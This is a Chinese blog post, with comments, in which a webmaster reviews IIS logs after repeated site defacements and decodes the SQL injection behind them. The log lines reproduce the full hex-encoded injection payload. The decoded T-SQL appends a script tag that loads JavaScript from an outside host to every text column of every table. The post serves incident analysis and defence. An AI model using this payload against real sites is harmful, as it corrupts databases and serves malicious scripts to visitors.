现在的位置: 首页黑客安全 > 正文
网站被攻击,揪出幕后黑手全纪录!
关键词:攻击 ┊ 来源: 原创收藏

朋友的网站在这一个月里频繁被攻击,让我看看是哪的问题,我也很纳闷。他的服务器安全一直是我在搞,程序很多也是我弄得,不应该有问题啊。服务器的安全性应该也是做到位了。又更改了几个参数,升级了Windows补丁、把程序的一些页面屏蔽了、打卡了IIS日志。
过了几天,又被加入恶意代码了。我气极了,不抓住他誓不罢休。
分析了一下,数据库应该是直接被改的,因为没有修改页面让他加JS代码了,服务器也不可能让他有远程的权限,下面就是分析这几天的IIS日志。
分析了一会儿,搜索关键字 ' 单引号 发现了问题:
2009-08-28 05:50:25 W3********* 202.*.*.* GET /pro_view.asp id=390';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b2727223e3c736372697074207372633d687474703a2f2f2533392533362533332532452537332537332532452536432536313e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72%20eXeC(@s);--|7|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_'dEcLaRe@svArChAr8000sEt@s'_附近有语法错误。 80 - 59.39.66.68 Mozilla/4.0 500 0 0


2009-08-28 05:50:26 W3********* 202.*.*.* GET /pro_view.asp id=390';dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b2727223e3c736372697074207372633d687474703a2f2f2533392533362533332532452537332537332532452536432536313e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72%20eXeC(@s);--|7|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]第_1_行:_'dEcLaRe@svArChAr8000sEt@s'_附近有语法错误。 80 - 59.39.66.68 Mozilla/4.0 500 0 0

典型的SQL注入
网上查了一下,用代码转义了一下这行代码,替换%20为空格,并打印变量
dEcLaRe @s vArChAr(8000)
sEt @s=0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d652066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29292b2727223e3c736372697074207372633d687474703a2f2f2533392533362533332532452537332537332532452536432536313e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72
print Lower(@s)

输出结果:
declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+''"><script src=http://%39%36%33%2e%73%73%2e%6c%61></script>''')fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor

果然就是这个JS代码,看来原因找到了,剩下的工作就是修补这段不是我写的带有注入漏洞的代码了!

而且在追踪过程中,发现不止我一个网站被攻击,还有很多网站被该IP挂马,保留采用法律解决问题的权利!

相关文章
    暂无相关文章
本文由 jack 发布于 3069天 9小时 30分钟前,目前已有 3345 人浏览
欢迎大家转载分享,请注明来源及链接;商业媒体转载请获得授权,谢谢合作!
 
zhangyufeng: 1楼3067天 21小时 5分钟前
encode 和 decode的方法 :
<?php
function SingleDecToHex($dec){
$tmp="";
$dec=$dec%16;
if($dec<10)
return $tmp.$dec;
$arr=array("a","b","c","d","e","f");
return $tmp.$arr[$dec-10];
}

function SingleHexToDec($hex){
$v=Ord($hex);
if(47<$v&&$v<58)
return $v-48;
if(96<$v&&$v<103)
return $v-87;
}

function SetToHexString($str){
if(!$str)return false;
$tmp="";
for($i=0;$i<strlen($str);$i++)
{
$ord=Ord($str[$i]);
$tmp.=SingleDecToHex(($ord-$ord%16)/16);
$tmp.=SingleDecToHex($ord%16);
}
return $tmp;
}

function UnsetFromHexString($str){
if(!$str)return false;
$tmp="";
for($i=0;$i<strlen($str);$i+=2)
{
$tmp.=chr(SingleHexToDec(substr($str,$i,1))*16+SingleHexToDec(substr($str,$i+1,1)));
}

return $tmp;

}


$sql = <<<SQL
0x4445434c415245204054207661726368617228323535292c404320766172636861722832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420612e6e616d652c622e6e616d65
2066726f6d207379736f626a6563747320612c737973636f6c756d6e73206220776865726520612e69643d622e696420616e6420612e78747970653d27752720616e642028622e78747970653d3939206f7220622e78747970653d3335
206f7220622e78747970653d323331206f7220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320574849
4c4528404046455443485f5354415455533d302920424547494e20657865632827757064617465205b272b40542b275d20736574205b272b40432b275d3d727472696d28636f6e7665727428766172636861722c5b272b40432b275d29
292b2727223e3c736372697074207372633d687474703a2f2f2533392533362533332532452537332537332532452536432536313e3c2f7363726970743e272727294645544348204e4558542046524f4d205461626c655f437572736f
7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72
SQL;
echo UnsetFromHexString($sql);
?为什么16进制编码后,mysql还是可以执行呢? 2进制编码后,mysql还可以执行吗?
jack: 2楼3067天 19小时 6分钟前
[quote=zhangyufeng]encode 和 decode的方法 :<?phpfunction SingleDecToHex($...[/quote]
我已经落伍啦,很久没关注黑客技术了,有点落后
感谢分享!
artskin: 3楼3067天 15小时 14分钟前
不懂,不过页面变形很厉害呀!
jack: 4楼3067天 13小时 5分钟前
[quote=artskin]不懂,不过页面变形很厉害呀![/quote] 呵呵 没人弄界面啊……
匿名网友: 5楼3060天 12小时 58分钟前
判断下参数是否是数字即可了
SQL注入,很古老的技术了
jack: 6楼3060天 10小时 27分钟前
[quote=音速开发者社区网友]判断下参数是否是数字即可了SQL注入,很古老的技术了[/quote]
并非这么简单,毕竟参数除了数字还有字符串

添加评论